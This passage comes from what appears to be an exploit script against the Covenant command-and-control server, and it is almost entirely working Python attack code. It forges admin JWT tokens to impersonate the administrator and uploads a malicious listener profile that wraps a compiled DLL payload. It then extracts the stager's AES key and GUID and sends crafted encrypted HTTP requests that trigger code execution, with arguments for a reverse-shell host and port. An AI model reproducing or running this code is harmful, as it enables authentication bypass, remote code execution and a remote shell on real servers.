'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73',        'httpGetResponse': '{DATA}',        'httpPostResponse': '{DATA}',        'id': 0,        'name': random_hex(8),        'description': '',        'type': 'HTTP',        'messageTransform': wrapper    }    response = request_api("post", token, "profiles/http", body)    if not response.ok:        print("\t[!] Failed to create the listener profile, quitting !")        exit(-1)    else:        profile_id = response.json().get('id')        print(f"\t[*] Profile created with id {profile_id}")        print("\t[*] Successfully created the listener profile")        return profile_iddef generate_valid_listener_port(impersonate_token, tries=0):    if tries >= 10:        print("\t[!] Tried 10 times to generate a listener port but failed, quitting !")        exit(-1)    port = random.randint(8000, 8250)  # TO BE EDITED WITH YOUR TARGET LISTENER PORT    listeners = request_api("get", impersonate_token, "listeners").json()    port_used = []    for listener in listeners:        port_used.append(listener["bindPort"])    if port in port_used:        print(f"\t[!] Port {port} is already taken by another listener, retrying !")        generate_valid_listener_port(impersonate_token, tries + 1)    else:        print(f"\t[*] Port {port} seems free")        return portdef get_id_listener_type(impersonate_token, listener_name):    response = request_api("get", impersonate_token, "listeners/types")    if not response.ok:        print("\t[!] Failed to get the listener type, quitting !")        exit(-1)    else:        for listener_type in response.json():            if listener_type["name"] == listener_name:                print(f'\t[*] Found id {listener_type["id"]} for listener {listener_name}')                return listener_type["id"]def generate_listener(impersonate_token, profile_id):    listener_port = generate_valid_listener_port(impersonate_token)    listener_name = random_hex(8)    data = {        'useSSL': False,        'urls': [            f"http://0.0.0.0:{listener_port}"        ],        'id': 0,        'name': listener_name,        'bindAddress': "0.0.0.0",        'bindPort': listener_port,        'connectAddresses': [            "0.0.0.0"        ],        'connectPort': listener_port,        'profileId': profile_id,        'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"),        'status': 'Active'    }    response = request_api("post", impersonate_token, "listeners/http", data)    if not response.ok:        print("\t[!] Failed to create the listener, quitting !")        exit(-1)    else:        print("\t[*] Successfully created the listener")        listener_id = response.json().get("id")        return listener_id, listener_portdef create_grunt(impersonate_token, data):    stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"]    if stager_code == "":        stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"]        if stager_code == "":            print("\t[!] Failed to create the grunt payload, quitting !")            exit(-1)    print("\t[*] Successfully created the grunt payload")    return stager_codedef get_grunt_config(impersonate_token, listener_id):    data = {        'id': 0,        'listenerId': listener_id,        'implantTemplateId': 1,        'name': 'Binary',        'description': 'Uses a generated .NET Framework binary to launch a Grunt.',        'type': 'binary',        'dotNetVersion': 'Net35',        'runtimeIdentifier': 'win_x64',        'validateCert': True,        'useCertPinning': True,        'smbPipeName': 'string',        'delay': 0,        'jitterPercent': 0,        'connectAttempts': 0,        'launcherString': 'GruntHTTP.exe',        'outputKind': 'consoleApplication',        'compressStager': False    }    stager_code = create_grunt(impersonate_token, data)    aes_key = re.search(r'FromBase64String$@\"(.[A-Za-z0-9+\/=]{40,50}?)\"$;', stager_code)    guid_prefix = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code)    if not aes_key or not guid_prefix:        print("\t[!] Failed to retrieve the grunt configuration, quitting !")        exit(-1)    aes_key = aes_key.group(1)    guid_prefix = guid_prefix.group(1)    print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}")    return aes_key, guid_prefixdef aes256_cbc_encrypt(key, message):    iv_bytes = urandom(16)    key_decoded = base64.b64decode(key)    encoded_message = pad(message.encode(), 16)    cipher = AES.new(key_decoded, AES.MODE_CBC, iv_bytes)    encrypted = cipher.encrypt(encoded_message)    hmac = HMAC.new(key_decoded, digestmod=SHA256)    signature = hmac.update(encrypted).digest()    return encrypted, iv_bytes, signaturedef trigger_exploit(listener_port, aes_key, guid):    message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"    ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message)    data = {        "GUID": guid,        "Type": 0,        "Meta": '',        "IV": base64.b64encode(iv).decode(),        "EncryptedMessage": base64.b64encode(ciphered).decode(),        "HMAC": base64.b64encode(signature).decode()    }    json_data = json.dumps(data).encode("utf-8")    payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73"    if send_exploit(listener_port, "Cookie", guid, payload):        print("\t[*] Exploit succeeded, check listener")    else :        print("\t[!] Exploit failed, retrying")        if send_exploit(listener_port, "Cookies", guid, payload):            print("\t[*] Exploit succeeded, check listener")        else:            print("\t[!] Exploit failed, quitting")def send_exploit(listener_port, header_cookie, guid, payload):    context.log_level = 'error'    request = f"""POST /en-us/test.html HTTP/1.1\rHost: {IP_TARGET}:{listener_port}\rUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\rContent-Type: application/x-www-form-urlencoded\rContent-Length: {len(payload)}\r\r{payload}""".encode()    sock = remote(IP_TARGET, listener_port)    sock.sendline(request)    response = sock.recv().decode()    sock.close()    if "HTTP/1.1 200 OK" in response:        return True    else:        return Falseif __name__ == "__main__":    check_requirements()    parser = argparse.ArgumentParser()    parser.add_argument("target",                        help="URL where the Covenant is hosted, example : https://127.0.0.1:7443")    parser.add_argument("os",                        help="Operating System of the target",                        choices=["windows", "linux"])    parser.add_argument("lhost",                        help="IP of the machine that will receive the reverse shell")    parser.add_argument("lport",                        help="Port of the machine that will receive the reverse shell")    args = parser.parse_args()    IP_TARGET = urlparse(args.target).hostname    print("[*] Getting the admin info")    sacrificial_token = craft_jwt("xThaz")    roles = request_api("get", sacrificial_token, "roles").json()    admin_username, admin_id = get_id_admin(sacrificial_token, roles)    impersonate_token = craft_jwt(admin_username, admin_id)    print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}")    print("[*] Generating payload")    dll_encoded = compile_payload()    wrapper = generate_wrapper(dll_encoded)    print("[*] Uploading malicious listener profile")    profile_id = upload_profile(impersonate_token, wrapper)    print("[*] Generating listener")    listener_id, listener_port = generate_listener(impersonate_token, profile_id)    print("[*] Triggering the exploit")    aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id)    trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")

Tag

#windows